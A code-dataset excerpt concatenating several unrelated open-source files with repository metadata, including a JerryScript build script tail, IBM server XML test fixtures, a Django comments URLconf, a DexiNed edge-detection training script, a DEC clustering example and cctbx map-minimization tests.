obj-y += main.o
{objects}
build_dirs:
{dirs}
$(OUT_SRC): build_dirs
'''.format(objects=jerry_objects, cflags=quark_cflags, dirs=jerry_build_dirs)
    write_file(quark_kbuild_path, quark_kbuild_content)
if __name__ == '__main__':
    # CLI entry point: expects exactly one argument, the Curie_BSP path.
    # NOTE(review): main() is defined elsewhere in this file (not visible
    # in this chunk).
    import sys
    if len(sys.argv) != 2:
        print('Usage:')
        print('{script_name} [full or relative path of Curie_BSP]'.format(script_name=sys.argv[0]))
        sys.exit(1)
    project_name = 'curie_bsp_jerry'
    # This script lives in targets/baremetal-sdk/curie-bsp/, so the
    # JerryScript root is three levels up.
    file_dir = os.path.dirname(os.path.abspath(__file__))
    jerry_path = os.path.join(file_dir, "..", "..", "..")
    curie_path = os.path.join(os.getcwd(), sys.argv[1])
    main(curie_path, project_name, jerry_path)
| 32.107143 | 113 | 0.66024 |
fe6124434f4049e2a32ac1bce2dbe6c619c4fd73 | 222 | py | Python | pythonteste/aula08a.py | genisyskernel/cursoemvideo-python | dec301e33933388c886fe78010f38adfb24dae82 | [
"MIT"
] | 1 | 2020-10-26T04:33:14.000Z | 2020-10-26T04:33:14.000Z | pythonteste/aula08a.py | genisyskernel/cursoemvideo-python | dec301e33933388c886fe78010f38adfb24dae82 | [
"MIT"
] | null | null | null | pythonteste/aula08a.py | genisyskernel/cursoemvideo-python | dec301e33933388c886fe78010f38adfb24dae82 | [
"MIT"
] | null | null | null | from math import sqrt
import emoji
num = int(input("Digite um nmero: "))
raiz = sqrt(num)
print("A raiz do nmero {0} {1:.2f}.".format(num, raiz))
print(emoji.emojize("Hello World! :earth_americas:", use_aliases=True))
| 31.714286 | 71 | 0.707207 |
fe619b4bba8137e17d2356d7038bb205bbb3ddcb | 8,074 | py | Python | src/ralph/discovery/tests/plugins/samples/http_ibm_system_x.py | quamilek/ralph | bf7231ea096924332b874718b33cd1f43f9c783b | [
"Apache-2.0"
] | null | null | null | src/ralph/discovery/tests/plugins/samples/http_ibm_system_x.py | quamilek/ralph | bf7231ea096924332b874718b33cd1f43f9c783b | [
"Apache-2.0"
] | null | null | null | src/ralph/discovery/tests/plugins/samples/http_ibm_system_x.py | quamilek/ralph | bf7231ea096924332b874718b33cd1f43f9c783b | [
"Apache-2.0"
] | null | null | null | macs_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetHostMacAddressesResponse</wsa:Action><wsa:RelatesTo>dt:1348742659504</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:111efb9a-f7d8-4977-8472-bcad40212a71</wsa:MessageID></s:Header><s:Body><GetHostMacAddressesResponse><HostMACaddress><HostMaddr><Description>Host Ethernet MAC Address 1</Description><Address>6E:F3:DD:E5:96:40</Address></HostMaddr><HostMaddr><Description>Host Ethernet MAC Address 2</Description><Address>6E:F3:DD:E5:96:42</Address></HostMaddr></HostMACaddress></GetHostMacAddressesResponse></s:Body></s:Envelope>
'''
memory_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetMemoryInfoResponse</wsa:Action><wsa:RelatesTo>dt:1348742659500</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:dc560696-2ba4-4917-b7e7-1aac1983b727</wsa:MessageID></s:Header><s:Body><GetMemoryInfoResponse><Memory><MemoryInfo><Description>DIMM 2</Description><PartNumber>HMT351R7BFR4A-H9</PartNumber><SerialNumber>33b8a62f</SerialNumber><ManufactureDate>4511</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 3</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>b38aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 6</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>a78aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 9</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>b524042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 11</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>ba24042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 12</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>8e8aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 
15</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>7feda482</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 18</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>d924042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo></Memory></GetMemoryInfoResponse></s:Body></s:Envelope>
'''
generic_data_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetVitalProductDataResponse</wsa:Action><wsa:RelatesTo>dt:1348742659499</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:e6829941-2510-4b3d-b9f3-61c7be372dfd</wsa:MessageID></s:Header><s:Body><GetVitalProductDataResponse><GetVitalProductDataResponse><MachineLevelVPD><ProductName>System x3550 M3</ProductName><MachineTypeAndModel>794452G</MachineTypeAndModel><SerialNumber>KD55ARA</SerialNumber><UUID>99A4E4A303023961B8E1561E33328996</UUID></MachineLevelVPD><ComponentLevelVPD><FRUNumber>59Y3915</FRUNumber><FRUName>DASD Backplane 1</FRUName><SerialNumber>Y010RW1AR1Y0</SerialNumber><MfgID>USIS</MfgID></ComponentLevelVPD><ComponentLevelVPD><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 1</FRUName><SerialNumber>K1411183222</SerialNumber><MfgID>ACBE</MfgID></ComponentLevelVPD><ComponentLevelVPD><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 2</FRUName><SerialNumber>K141115Y2BK</SerialNumber><MfgID>ACBE</MfgID></ComponentLevelVPD><ComponentActivityLog><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 1</FRUName><SerialNumber>K1411183222</SerialNumber><MfgID>ACBE</MfgID><Action>Added</Action><TimeStamp>11/25/2011:13:53:13</TimeStamp></ComponentActivityLog><ComponentActivityLog><FRUNumber>59Y3915</FRUNumber><FRUName>DASD Backplane 1</FRUName><SerialNumber>Y010RW1AR1Y0</SerialNumber><MfgID>USIS</MfgID><Action>Added</Action><TimeStamp>11/25/2011:13:53:13</TimeStamp></ComponentActivityLog><ComponentActivityLog><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 
2</FRUName><SerialNumber>K141115Y2BK</SerialNumber><MfgID>ACBE</MfgID><Action>Added</Action><TimeStamp>01/27/2012:10:28:39</TimeStamp></ComponentActivityLog><VPD><FirmwareName>IMM</FirmwareName><VersionString>YUOOC7E</VersionString><ReleaseDate>09/30/2011</ReleaseDate></VPD><VPD><FirmwareName>UEFI</FirmwareName><VersionString>D6E154A</VersionString><ReleaseDate>09/23/2011</ReleaseDate></VPD><VPD><FirmwareName>DSA</FirmwareName><VersionString>DSYT89P </VersionString><ReleaseDate>10/28/2011</ReleaseDate></VPD></GetVitalProductDataResponse></GetVitalProductDataResponse></s:Body></s:Envelope>
'''
sn_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/iBMCControl/GetSPNameSettingsResponse</wsa:Action><wsa:RelatesTo>dt:1348742647137</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:d2ac4b59-9f60-456e-a182-6a077557e4c1</wsa:MessageID></s:Header><s:Body><GetSPNameSettingsResponse><SPName>SN# KD55ARA</SPName></GetSPNameSettingsResponse></s:Body></s:Envelope>
'''
processors_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetProcessorInfoResponse</wsa:Action><wsa:RelatesTo>dt:1348757382511</wsa:RelatesTo><wsa:From><wsa:Address>http://rack-605-12-mgmt.dc2/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:9e5ec08d-0fac-449a-80fa-37cc78290a21</wsa:MessageID></s:Header><s:Body><GetProcessorInfoResponse><Processor><ProcessorInfo><Description>Processor 1</Description><Speed>2666</Speed><Identifier>3030363735304141</Identifier><Type>Central</Type><Family>Intel Xeon</Family><Cores>8</Cores><Threads>1</Threads><Voltage>1.087000</Voltage><Datawidth>64</Datawidth></ProcessorInfo><ProcessorInfo><Description>Processor 2</Description><Speed>2666</Speed><Identifier>3030363735304141</Identifier><Type>Central</Type><Family>Intel Xeon</Family><Cores>8</Cores><Threads>1</Threads><Voltage>1.087000</Voltage><Datawidth>64</Datawidth></ProcessorInfo></Processor></GetProcessorInfoResponse></s:Body></s:Envelope>
'''
| 621.076923 | 2,572 | 0.792172 |
fe61ee9fb03a144ec04e2fb8220326b27f35be96 | 18,786 | py | Python | main.py | AdrienCourtois/DexiNed | 1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1 | [
"MIT"
] | null | null | null | main.py | AdrienCourtois/DexiNed | 1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1 | [
"MIT"
] | null | null | null | main.py | AdrienCourtois/DexiNed | 1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1 | [
"MIT"
] | null | null | null |
from __future__ import print_function
import argparse
import os
import time, platform
import cv2
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
from datasets import DATASET_NAMES, BipedDataset, TestDataset, dataset_info
from losses import *
from model import DexiNed
# from model0C import DexiNed
from utils import (image_normalization, save_image_batch_to_disk,
visualize_result)
IS_LINUX = True if platform.system()=="Linux" else False
def parse_args():
    """Parse command line arguments.

    Returns an ``argparse.Namespace`` with all trainer/tester settings.

    Note: ``parser.parse_args()`` is called part-way through on purpose —
    the value of ``--choose_test_data`` is needed to derive the
    dataset-dependent defaults of the arguments registered afterwards.
    """
    parser = argparse.ArgumentParser(description='DexiNed trainer.')
    parser.add_argument('--choose_test_data',
                        type=int,
                        default=3,
                        help='Already set the dataset for testing choice: 0 - 8')
    # ----------- test -------0--
    # Early parse: only --choose_test_data is consumed here; it selects the
    # test dataset whose metadata feeds the remaining defaults.
    TEST_DATA = DATASET_NAMES[parser.parse_args().choose_test_data] # max 8
    test_inf = dataset_info(TEST_DATA, is_linux=IS_LINUX)
    test_dir = test_inf['data_dir']
    is_testing = True # current test _bdcnlossNew256-sd7-1.10.4p5
    # Training settings
    TRAIN_DATA = DATASET_NAMES[0] # BIPED=0
    train_inf = dataset_info(TRAIN_DATA, is_linux=IS_LINUX)
    train_dir = train_inf['data_dir']
    # Data parameters
    parser.add_argument('--input_dir',
                        type=str,
                        default=train_dir,
                        help='the path to the directory with the input data.')
    parser.add_argument('--input_val_dir',
                        type=str,
                        default=test_inf['data_dir'],
                        help='the path to the directory with the input data for validation.')
    parser.add_argument('--output_dir',
                        type=str,
                        default='checkpoints',
                        help='the path to output the results.')
    parser.add_argument('--train_data',
                        type=str,
                        choices=DATASET_NAMES,
                        default=TRAIN_DATA,
                        help='Name of the dataset.')
    parser.add_argument('--test_data',
                        type=str,
                        choices=DATASET_NAMES,
                        default=TEST_DATA,
                        help='Name of the dataset.')
    parser.add_argument('--test_list',
                        type=str,
                        default=test_inf['test_list'],
                        help='Dataset sample indices list.')
    parser.add_argument('--train_list',
                        type=str,
                        default=train_inf['train_list'],
                        help='Dataset sample indices list.')
    # NOTE(review): argparse ``type=bool`` converts any non-empty string
    # (even "False") to True — these flags effectively always take their
    # defaults unless passed an empty string. TODO confirm intended; a
    # str2bool converter or store_true action would behave as expected.
    parser.add_argument('--is_testing',type=bool,
                        default=is_testing,
                        help='Script in testing mode.')
    parser.add_argument('--double_img',
                        type=bool,
                        default=True,
                        help='True: use same 2 imgs changing channels') # Just for test
    parser.add_argument('--resume',
                        type=bool,
                        default=False,
                        help='use previous trained data') # Just for test
    parser.add_argument('--checkpoint_data',
                        type=str,
                        default='14/14_model.pth',
                        help='Checkpoint path from which to restore model weights from.')
    parser.add_argument('--test_img_width',
                        type=int,
                        default=test_inf['img_width'],
                        help='Image width for testing.')
    parser.add_argument('--test_img_height',
                        type=int,
                        default=test_inf['img_height'],
                        help='Image height for testing.')
    parser.add_argument('--res_dir',
                        type=str,
                        default='result',
                        help='Result directory')
    parser.add_argument('--log_interval_vis',
                        type=int,
                        default=50,
                        help='The number of batches to wait before printing test predictions.')
    parser.add_argument('--epochs',
                        type=int,
                        default=22,
                        metavar='N',
                        help='Number of training epochs (default: 25).')
    parser.add_argument('--lr',
                        default=1e-4,
                        type=float,
                        help='Initial learning rate.')
    parser.add_argument('--wd',
                        type=float,
                        default=1e-4,
                        metavar='WD',
                        help='weight decay (default: 1e-4)')
    # parser.add_argument('--lr_stepsize',
    #                     default=1e4,
    #                     type=int,
    #                     help='Learning rate step size.')
    parser.add_argument('--batch_size',
                        type=int,
                        default=8,
                        metavar='B',
                        help='the mini-batch size (default: 8)')
    parser.add_argument('--workers',
                        default=8,
                        type=int,
                        help='The number of workers for the dataloaders.')
    parser.add_argument('--tensorboard',type=bool,
                        default=True,
                        help='Use Tensorboard for logging.'),
    parser.add_argument('--img_width',
                        type=int,
                        default=480,
                        help='Image width for training.') # BIPED 400 BSDS 352 MDBD 480
    parser.add_argument('--img_height',
                        type=int,
                        default=480,
                        help='Image height for training.') # BIPED 400 BSDS 352
    parser.add_argument('--channel_swap',
                        default=[2, 1, 0],
                        type=int)
    parser.add_argument('--crop_img',
                        default=True,
                        type=bool,
                        help='If true crop training images, else resize images to match image width and height.')
    parser.add_argument('--mean_pixel_values',
                        default=[103.939,116.779,123.68, 137.86],
                        type=float) # [103.939,116.779,123.68] [104.00699, 116.66877, 122.67892]
    args = parser.parse_args()
    return args
def main(args):
    """Main function.

    Trains DexiNed (when ``args.is_testing`` is False) or runs inference
    over the validation/test dataloader, saving a checkpoint per epoch
    under ``<output_dir>/<train_data>/<epoch>/``.
    """
    print(f"Number of GPU's available: {torch.cuda.device_count()}")
    print(f"Pytorch version: {torch.__version__}")
    # Tensorboard summary writer
    tb_writer = None
    training_dir = os.path.join(args.output_dir,args.train_data)
    os.makedirs(training_dir,exist_ok=True)
    checkpoint_path = os.path.join(args.output_dir, args.train_data, args.checkpoint_data)
    if args.tensorboard and not args.is_testing:
        # from tensorboardX import SummaryWriter # previous torch version
        from torch.utils.tensorboard import SummaryWriter # for torch 1.4 or greather
        tb_writer = SummaryWriter(log_dir=training_dir)
    # Get computing device
    device = torch.device('cpu' if torch.cuda.device_count() == 0
                          else 'cuda')
    # Instantiate model and move it to the computing device
    model = DexiNed().to(device)
    # model = nn.DataParallel(model)
    ini_epoch =0
    if not args.is_testing:
        if args.resume:
            # NOTE(review): the resume epoch is hard-coded to 17 and must
            # match the checkpoint in --checkpoint_data — confirm on use.
            ini_epoch=17
            model.load_state_dict(torch.load(checkpoint_path,
                                             map_location=device))
        dataset_train = BipedDataset(args.input_dir,
                                     img_width=args.img_width,
                                     img_height=args.img_height,
                                     mean_bgr=args.mean_pixel_values[0:3] if len(
                                         args.mean_pixel_values) == 4 else args.mean_pixel_values,
                                     train_mode='train',
                                     arg=args
                                     )
        dataloader_train = DataLoader(dataset_train,
                                      batch_size=args.batch_size,
                                      shuffle=True,
                                      num_workers=args.workers)
    dataset_val = TestDataset(args.input_val_dir,
                              test_data=args.test_data,
                              img_width=args.test_img_width,
                              img_height=args.test_img_height,
                              mean_bgr=args.mean_pixel_values[0:3] if len(
                                  args.mean_pixel_values) == 4 else args.mean_pixel_values,
                              test_list=args.test_list, arg=args
                              )
    dataloader_val = DataLoader(dataset_val,
                                batch_size=1,
                                shuffle=False,
                                num_workers=args.workers)
    # Testing
    if args.is_testing:
        output_dir = os.path.join(args.res_dir, args.train_data+"2"+ args.test_data)
        print(f"output_dir: {output_dir}")
        if args.double_img:
            # predict twice an image changing channels, then mix those results
            testPich(checkpoint_path, dataloader_val, model, device, output_dir, args)
        else:
            test(checkpoint_path, dataloader_val, model, device, output_dir, args)
        return
    criterion = bdcn_loss2
    optimizer = optim.Adam(model.parameters(),
                           lr=args.lr,
                           weight_decay=args.wd)
    # lr_schd = lr_scheduler.StepLR(optimizer, step_size=args.lr_stepsize,
    #                               gamma=args.lr_gamma)
    # Main training loop
    # Every 7 epochs the RNG seeds are bumped and re-applied so long runs do
    # not repeat the same augmentation stream.
    # NOTE(review): ``np`` is not among the visible imports — presumably it
    # comes from ``from losses import *``; confirm.
    seed=1021
    for epoch in range(ini_epoch,args.epochs):
        if epoch%7==0:
            seed = seed+1000
            np.random.seed(seed)
            torch.manual_seed(seed)
            torch.cuda.manual_seed(seed)
            print("------ Random seed applied-------------")
        # Create output directories
        output_dir_epoch = os.path.join(args.output_dir,args.train_data, str(epoch))
        img_test_dir = os.path.join(output_dir_epoch, args.test_data + '_res')
        os.makedirs(output_dir_epoch,exist_ok=True)
        os.makedirs(img_test_dir,exist_ok=True)
        train_one_epoch(epoch,
                        dataloader_train,
                        model,
                        criterion,
                        optimizer,
                        device,
                        args.log_interval_vis,
                        tb_writer,
                        args=args)
        validate_one_epoch(epoch,
                           dataloader_val,
                           model,
                           device,
                           img_test_dir,
                           arg=args)
        # Save model after end of every epoch
        torch.save(model.module.state_dict() if hasattr(model, "module") else model.state_dict(),
                   os.path.join(output_dir_epoch, '{0}_model.pth'.format(epoch)))
# Script entry point: parse CLI arguments, then train or test DexiNed.
if __name__ == '__main__':
    args = parse_args()
    main(args)
| 42.406321 | 121 | 0.524806 |
fe62800d500daa91f541e4f0b0257370caac7c78 | 5,905 | py | Python | src/core/build/pretreat_targets.py | chaoyangcui/test_developertest | 151309bf6cdc7e31493a3461d3c7f17a1b371c09 | [
"Apache-2.0"
] | null | null | null | src/core/build/pretreat_targets.py | chaoyangcui/test_developertest | 151309bf6cdc7e31493a3461d3c7f17a1b371c09 | [
"Apache-2.0"
] | null | null | null | src/core/build/pretreat_targets.py | chaoyangcui/test_developertest | 151309bf6cdc7e31493a3461d3c7f17a1b371c09 | [
"Apache-2.0"
] | 1 | 2021-09-13T12:03:37.000Z | 2021-09-13T12:03:37.000Z | #!/usr/bin/env python3
# coding=utf-8
#
# Copyright (c) 2021 Huawei Device Co., Ltd.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import json
import shutil
from core.constants import JsTestConst
from xdevice import platform_logger
LOG = platform_logger("PretreatTargets")
##############################################################################
##############################################################################
##############################################################################
##############################################################################
| 39.366667 | 78 | 0.573412 |
fe63a253f1cf19a404c6e2b601535edfb1888800 | 657 | py | Python | tests/testapp/urls.py | lukaszbanasiak/django-contrib-comments | 8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead | [
"BSD-3-Clause"
] | 1 | 2018-05-29T08:43:57.000Z | 2018-05-29T08:43:57.000Z | tests/testapp/urls.py | lukaszbanasiak/django-contrib-comments | 8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead | [
"BSD-3-Clause"
] | null | null | null | tests/testapp/urls.py | lukaszbanasiak/django-contrib-comments | 8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead | [
"BSD-3-Clause"
] | 1 | 2018-08-25T01:38:12.000Z | 2018-08-25T01:38:12.000Z | from __future__ import absolute_import
from django.conf.urls import patterns, url
from django_comments.feeds import LatestCommentFeed
from custom_comments import views
# Feed classes exposed by this test app, keyed by slug.
feeds = {
    'comments': LatestCommentFeed,
}
# Legacy Django URLconf (``patterns()`` was removed in Django 1.10);
# wires up the custom comment views exercised by the test-suite.
urlpatterns = patterns('',
    url(r'^post/$', views.custom_submit_comment),
    url(r'^flag/(\d+)/$', views.custom_flag_comment),
    url(r'^delete/(\d+)/$', views.custom_delete_comment),
    url(r'^approve/(\d+)/$', views.custom_approve_comment),
    url(r'^cr/(\d+)/(.+)/$', 'django.contrib.contenttypes.views.shortcut', name='comments-url-redirect'),
)
# RSS feed of the latest comments (old-style tuple entry syntax).
urlpatterns += patterns('',
    (r'^rss/comments/$', LatestCommentFeed()),
)
| 26.28 | 105 | 0.692542 |
fe6407132244604eabc2321eb05eb24333b3bd82 | 669 | py | Python | pyTorch/utils.py | rajasekar-venkatesan/Deep_Learning | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | [
"MIT"
] | null | null | null | pyTorch/utils.py | rajasekar-venkatesan/Deep_Learning | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | [
"MIT"
] | null | null | null | pyTorch/utils.py | rajasekar-venkatesan/Deep_Learning | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | [
"MIT"
] | null | null | null | import pandas as pd, numpy as np
from sklearn.preprocessing import OneHotEncoder
# Author-initials -> integer class label mapping (presumably the Kaggle
# "Spooky Author Identification" authors: EAP = Edgar Allan Poe,
# HPL = H. P. Lovecraft, MWS = Mary W. Shelley — TODO confirm).
author_int_dict = {'EAP':0,'HPL':1,'MWS':2}
if __name__ == '__main__':
pass | 33.45 | 87 | 0.689088 |
fe64404bf937356d7de814318a6e0bdf49ea36b3 | 6,987 | py | Python | example/dec/dec.py | TheBurningCrusade/A_mxnet | fa2a8e3c438bea16b993e9537f75e2082d83346f | [
"Apache-2.0"
] | 159 | 2016-08-23T22:13:26.000Z | 2021-10-24T01:31:35.000Z | example/dec/dec.py | mrgloom/FaceDetection-ConvNet-3D | f9251c48eb40c5aec8fba7455115c355466555be | [
"Apache-2.0"
] | 10 | 2016-08-23T05:59:07.000Z | 2018-05-24T02:31:41.000Z | example/dec/dec.py | mrgloom/FaceDetection-ConvNet-3D | f9251c48eb40c5aec8fba7455115c355466555be | [
"Apache-2.0"
] | 77 | 2016-08-21T00:35:00.000Z | 2021-06-01T05:03:34.000Z | # pylint: skip-file
import sys
import os
# code to automatically download dataset
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path = [os.path.join(curr_path, "../autoencoder")] + sys.path
import mxnet as mx
import numpy as np
import data
from scipy.spatial.distance import cdist
from sklearn.cluster import KMeans
import model
from autoencoder import AutoEncoderModel
from solver import Solver, Monitor
import logging
# Entry point: run the DEC experiment on MNIST using GPU 0.
# NOTE(review): ``mnist_exp`` is not defined among the visible imports —
# presumably defined elsewhere in this file; confirm before running.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    mnist_exp(mx.gpu(0))
| 44.788462 | 116 | 0.586232 |
fe646aafd2f602c63f8aacb84f51c78795b63990 | 7,537 | py | Python | cctbx/maptbx/tst_target_and_gradients.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | cctbx/maptbx/tst_target_and_gradients.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | cctbx/maptbx/tst_target_and_gradients.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | from __future__ import division
from cctbx.array_family import flex
from cctbx import xray
from cctbx import crystal
from cctbx import maptbx
from cctbx.maptbx import minimization
from libtbx.test_utils import approx_equal
import random
from cctbx.development import random_structure
from cctbx import sgtbx
# Toggle: seed both the Python RNG and the cctbx flex RNG so the
# regression exercises below are deterministic; set to 0 for fresh
# randomness.
if (1):
  random.seed(0)
  flex.set_random_seed(0)
def exercise_00():
  """
  Smoke-test maptbx.target_and_gradients_diffmap: the target and all
  gradients must vanish when the current map equals the target map, and
  become non-zero after the model is translated.
  """
  structure = get_xrs()
  map_data, f_calc = get_map(xrs=structure)
  # Identical target/current maps: everything must be exactly zero.
  tg = maptbx.target_and_gradients_diffmap(
    unit_cell=structure.unit_cell(),
    map_target=map_data,
    map_current=map_data,
    step=0.3,
    sites_frac=structure.sites_frac())
  assert approx_equal(structure.sites_cart(), [[0,0,0]])
  assert approx_equal(tg.target(), 0)
  assert approx_equal(list(tg.gradients()), [[0,0,0]])
  # Translate the single-atom model away from the origin; the diff-map
  # target must turn positive with non-zero gradient components.
  structure = structure.translate(x=0.3, y=-0.5, z=0.7)
  assert approx_equal(structure.sites_cart(), [[0.3,-0.5,0.7]])
  map_current, f_calc = get_map(xrs=structure)
  tg = maptbx.target_and_gradients_diffmap(
    unit_cell=structure.unit_cell(),
    map_target=map_data,
    map_current=map_current,
    step=0.3,
    sites_frac=structure.sites_frac())
  assert tg.target() > 0
  for grad in tg.gradients():
    for component in grad:
      assert abs(component) > 0.
def exercise_01(d_min=1.0):
  """
  Exercise maptbx.target_and_gradients_diffmap in action: minimization.

  For every combination of +/-/0 shifts along x, y, z the shifted copy
  must be pulled back to the origin by the diffmap minimizer.
  """
  xrs = get_xrs()
  map_target, f_calc = get_map(xrs=xrs)
  assert approx_equal(xrs.sites_cart(), [[0,0,0]])
  # Enumerate all 27 sign combinations of the translation.
  for sx in [-1,0,1]:
    for sy in [-1,0,1]:
      for sz in [-1,0,1]:
        xrs_cp = xrs.deep_copy_scatterers()
        xrs_cp = xrs_cp.translate(x=0.3*sx, y=0.5*sy, z=0.7*sz)
        assert approx_equal(xrs_cp.sites_cart(), [[0.3*sx,0.5*sy,0.7*sz]],1.e-6)
        crystal_gridding = maptbx.crystal_gridding(
          unit_cell             = xrs_cp.unit_cell(),
          space_group_info      = xrs_cp.space_group_info(),
          pre_determined_n_real = map_target.accessor().all())
        o = minimization.run(
          xray_structure   = xrs_cp,
          miller_array     = f_calc,
          crystal_gridding = crystal_gridding,
          map_target       = map_target,
          step             = d_min/4,
          target_type      = "diffmap")
        # The unshifted reference must remain at the origin.
        assert approx_equal(xrs.sites_cart(), [[0,0,0]])
def exercise_02():
  """
  Exercise maptbx.target_and_gradients_diffmap in action: minimization
  (bigger model).

  A 50-atom structure is shaken by ~0.8 A and must be driven back onto
  the reference by five rounds of diffmap minimization.
  """
  xrs = random_structure.xray_structure(
    space_group_info = sgtbx.space_group_info("P212121"),
    elements         = ["N","C","O","S","P"]*10,
    volume_per_atom  = 50)
  map_target,tmp,tmp = compute_map(xray_structure = xrs)
  xrs_sh = xrs.deep_copy_scatterers()
  xrs_sh.shake_sites_in_place(mean_distance=0.8)
  start_error = flex.mean(xrs.distances(other = xrs_sh))
  assert start_error>0.7
  map_current, miller_array, crystal_gridding = compute_map(
    xray_structure = xrs_sh)
  # Five minimization rounds with a fixed step of d_min/4.
  for step in [miller_array.d_min()/4]*5:
    minimized = minimization.run(
      xray_structure              = xrs_sh,
      miller_array                = miller_array,
      crystal_gridding            = crystal_gridding,
      map_target                  = map_target,
      max_iterations              = 500,
      min_iterations              = 25,
      step                        = step,
      geometry_restraints_manager = None,
      target_type                 = "diffmap")
    xrs_sh = minimized.xray_structure
    map_current = minimized.map_current
  final_error = flex.mean(xrs.distances(other = minimized.xray_structure))
  assert approx_equal(start_error, 0.8, 1.e-3)
  assert final_error < 1.e-4
def exercise_03():
  """
